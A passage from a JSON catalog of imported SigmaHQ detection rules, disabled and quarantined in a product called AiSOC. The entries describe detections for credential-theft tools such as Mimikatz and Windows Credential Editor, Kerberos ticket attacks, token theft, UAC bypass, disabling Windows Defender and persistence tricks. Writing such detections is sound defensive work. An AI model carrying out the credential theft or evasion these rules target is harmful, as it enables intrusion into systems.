"rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml" } }, { "id": "sigmahq-sigma-a66bc059-c370-472c-a0d7-f8fd1bf9d583", "type": "detection", "name": "Network Connection Initiated By Eqnedt32.EXE", "description": "Detects network connections from the Equation Editor process \"eqnedt32.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-eqnedt32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_eqnedt.yml" } }, { "id": "sigmahq-sigma-a6976974-ea6f-4e97-818e-ea08625c52cb", "type": "detection", "name": "Potential RipZip Attack on Startup Folder", "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ripzip-attack-on-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ripzip_attack.yml" } }, { "id": "sigmahq-sigma-a699b30e-d010-46c8-bbd1-ee2e26765fe9", "type": "detection", "name": "Powershell Store File In Alternate Data Stream", "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-store-file-in-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" } }, { "id": "sigmahq-sigma-a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "type": "detection", "name": "Potentially Suspicious Powershell Script Execution From Temp Folder", "description": "Detects a potentially suspicious powershell script executions from temporary folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-powershell-script-execution-from-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_script_exec_from_temp_folder.yml" } }, { "id": "sigmahq-sigma-a6b33c02-8305-488f-8585-03cb2a7763f2", "type": "detection", "name": "Windows Credential Editor Registry", "description": "Detects the use of Windows Credential Editor (WCE)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-editor-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" } }, { "id": "sigmahq-sigma-a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "type": "detection", "name": "RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses", "description": "Detects calls to the AtomicTestHarnesses \"Invoke-ATHRemoteFXvGPUDisablementCommand\" which is designed to abuse the \"RemoteFXvGPUDisablement.exe\" binary to run custom PowerShell code via module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remotefxvgpudisablement-abuse-via-atomictestharnesses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-a70dcb37-3bee-453a-99df-d0c683151be6", "type": "detection", "name": "Firewall Rule Update Via Netsh.EXE", "description": "Detects execution of netsh with the \"advfirewall\" and the \"set\" option in order to set new values for properties of a existing rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-rule-update-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a70dcb37-3bee-453a-99df-d0c683151be6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml" } }, { "id": "sigmahq-sigma-a717c561-d117-437e-b2d9-0118a7035d01", "type": "detection", "name": "OneLogin User Account Locked", "description": "Detects when an user account is locked or suspended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onelogin-user-account-locked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a717c561-d117-437e-b2d9-0118a7035d01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/onelogin/onelogin_user_account_locked.yml" } }, { "id": "sigmahq-sigma-a743ceba-c771-4d75-97eb-8a90f7f4844c", "type": "detection", "name": "UAC Bypass Using PkgMgr and DISM", "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-pkgmgr-and-dism.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" } }, { "id": "sigmahq-sigma-a746c9b8-a2fb-4ee5-a428-92bee9e99060", "type": "detection", "name": "SQL Client Tools PowerShell Session Detection", "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sql-client-tools-powershell-session-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml" } }, { "id": "sigmahq-sigma-a753a6af-3126-426d-8bd0-26ebbcb92254", "type": "detection", "name": "Osacompile Execution By Potentially Suspicious Applet/Osascript", "description": "Detects potential suspicious applet or osascript executing \"osacompile\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/osacompile-execution-by-potentially-suspicious-applet-osascript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a753a6af-3126-426d-8bd0-26ebbcb92254", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml" } }, { "id": "sigmahq-sigma-a7664b14-75fb-4a50-a223-cb9bc0afbacf", "type": "detection", "name": "HackTool - RemoteKrbRelay Execution", "description": "Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-remotekrbrelay-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7664b14-75fb-4a50-a223-cb9bc0afbacf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay_remote.yml" } }, { "id": "sigmahq-sigma-a77c1610-fc73-4019-8e29-0f51efc04a51", "type": "detection", "name": "Potential Dosfuscation Activity", "description": "Detects possible payload obfuscation via the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dosfuscation-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" } }, { "id": "sigmahq-sigma-a7af2487-9c2f-42e4-9bb9-ff961f0561d5", "type": "detection", "name": "Audio Capture", "description": "Detects attempts to record audio using the arecord and ecasound utilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audio-capture.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_audio_capture.yml" } }, { "id": "sigmahq-sigma-a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", "type": "detection", "name": "Juniper BGP Missing MD5", "description": "Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/juniper-bgp-missing-md5.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/juniper/bgp/juniper_bgp_missing_md5.yml" } }, { "id": "sigmahq-sigma-a7c3d773-caef-227e-a7e7-c2f13c622329", "type": "detection", "name": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bad-opsec-defaults-sacrificial-processes-with-improper-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7c3d773-caef-227e-a7e7-c2f13c622329", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" } }, { "id": "sigmahq-sigma-a7df0e9e-91a5-459a-a003-4cde67c2ff5d", "type": "detection", "name": "Potentially Suspicious Command Executed Via Run Dialog Box - Registry", "description": "Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\nThis technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-command-executed-via-run-dialog-box-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7df0e9e-91a5-459a-a003-4cde67c2ff5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml" } }, { "id": "sigmahq-sigma-a7ee1722-c3c5-aeff-3212-c777e4733217", "type": "detection", "name": "Disable Windows Defender AV Security Monitoring", "description": "Detects attackers attempting to disable Windows Defender using Powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-defender-av-security-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a7ee1722-c3c5-aeff-3212-c777e4733217", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" } }, { "id": "sigmahq-sigma-a80d927d-ac6e-443f-a867-e8d6e3897318", "type": "detection", "name": "Creation Of Pod In System Namespace", "description": "Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.\nSystem pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.\nAttackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.\nDeployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-pod-in-system-namespace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a80d927d-ac6e-443f-a867-e8d6e3897318", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_pod_in_system_namespace.yml" } }, { "id": "sigmahq-sigma-a80f662f-022f-4429-9b8c-b1a41aaa6688", "type": "detection", "name": "Internet Explorer Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/internet-explorer-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" } }, { "id": "sigmahq-sigma-a8322756-015c-42e7-afb1-436e85ed3ff5", "type": "detection", "name": "DNS TOR Proxies", "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-tor-proxies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a8322756-015c-42e7-afb1-436e85ed3ff5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_torproxy.yml" } }, { "id": "sigmahq-sigma-a840e606-7c8c-4684-9bc1-eb6b6155127f", "type": "detection", "name": "PUA - AWS TruffleHog Execution", "description": "Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment.\nIt has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-aws-trufflehog-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a840e606-7c8c-4684-9bc1-eb6b6155127f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_pua_trufflehog.yml" } }, { "id": "sigmahq-sigma-a84fc3b1-c9ce-4125-8e74-bdcdb24021f1", "type": "detection", "name": "Primary Refresh Token Access Attempt", "description": "Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/primary-refresh-token-access-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a84fc3b1-c9ce-4125-8e74-bdcdb24021f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml" } }, { "id": "sigmahq-sigma-a85f7765-698a-4088-afa0-ecfbf8d01fa4", "type": "detection", "name": "Potential Memory Dumping Activity Via LiveKD", "description": "Detects execution of LiveKD based on PE metadata or image name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-memory-dumping-activity-via-livekd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a85f7765-698a-4088-afa0-ecfbf8d01fa4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml" } }, { "id": "sigmahq-sigma-a85ffc3a-e8fd-4040-93bf-78aff284d801", "type": "detection", "name": "Use Of The SFTP.EXE Binary As A LOLBIN", "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-the-sftp-exe-binary-as-a-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" } }, { "id": "sigmahq-sigma-a861d835-af37-4930-bcd6-5b178bfb54df", "type": "detection", "name": "Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock", "description": "Detects PowerShell scripts that utilize native PowerShell Identity modules to request Kerberos tickets.\nThis behavior is typically seen during a Kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kerberos-ticket-request-via-powershell-script-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a861d835-af37-4930-bcd6-5b178bfb54df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" } }, { "id": "sigmahq-sigma-a8f29a7b-b137-4446-80a0-b804272f3da2", "type": "detection", "name": "Persistence and Execution at Scale via GPO Scheduled Task", "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-and-execution-at-scale-via-gpo-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" } }, { "id": "sigmahq-sigma-a8f866e1-bdd4-425e-a27a-37619238d9c7", "type": "detection", "name": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream", "description": "Detects the creation of hidden file/folder with the \"::$index_allocation\" stream. Which can be used as a technique to prevent access to folder and files from tooling such as \"explorer.exe\" and \"powershell.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-hidden-directory-creation-via-ntfs-index-allocation-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a8f866e1-bdd4-425e-a27a-37619238d9c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml" } }, { "id": "sigmahq-sigma-a94cdd87-6c54-4678-a6cc-2814ffe5a13d", "type": "detection", "name": "Unix Shell Configuration Modification", "description": "Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unix-shell-configuration-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a94cdd87-6c54-4678-a6cc-2814ffe5a13d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_unix_shell_configuration_modification.yml" } }, { "id": "sigmahq-sigma-a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "type": "detection", "name": "Suspicious Service DACL Modification Via Set-Service Cmdlet", "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-dacl-modification-via-set-service-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query 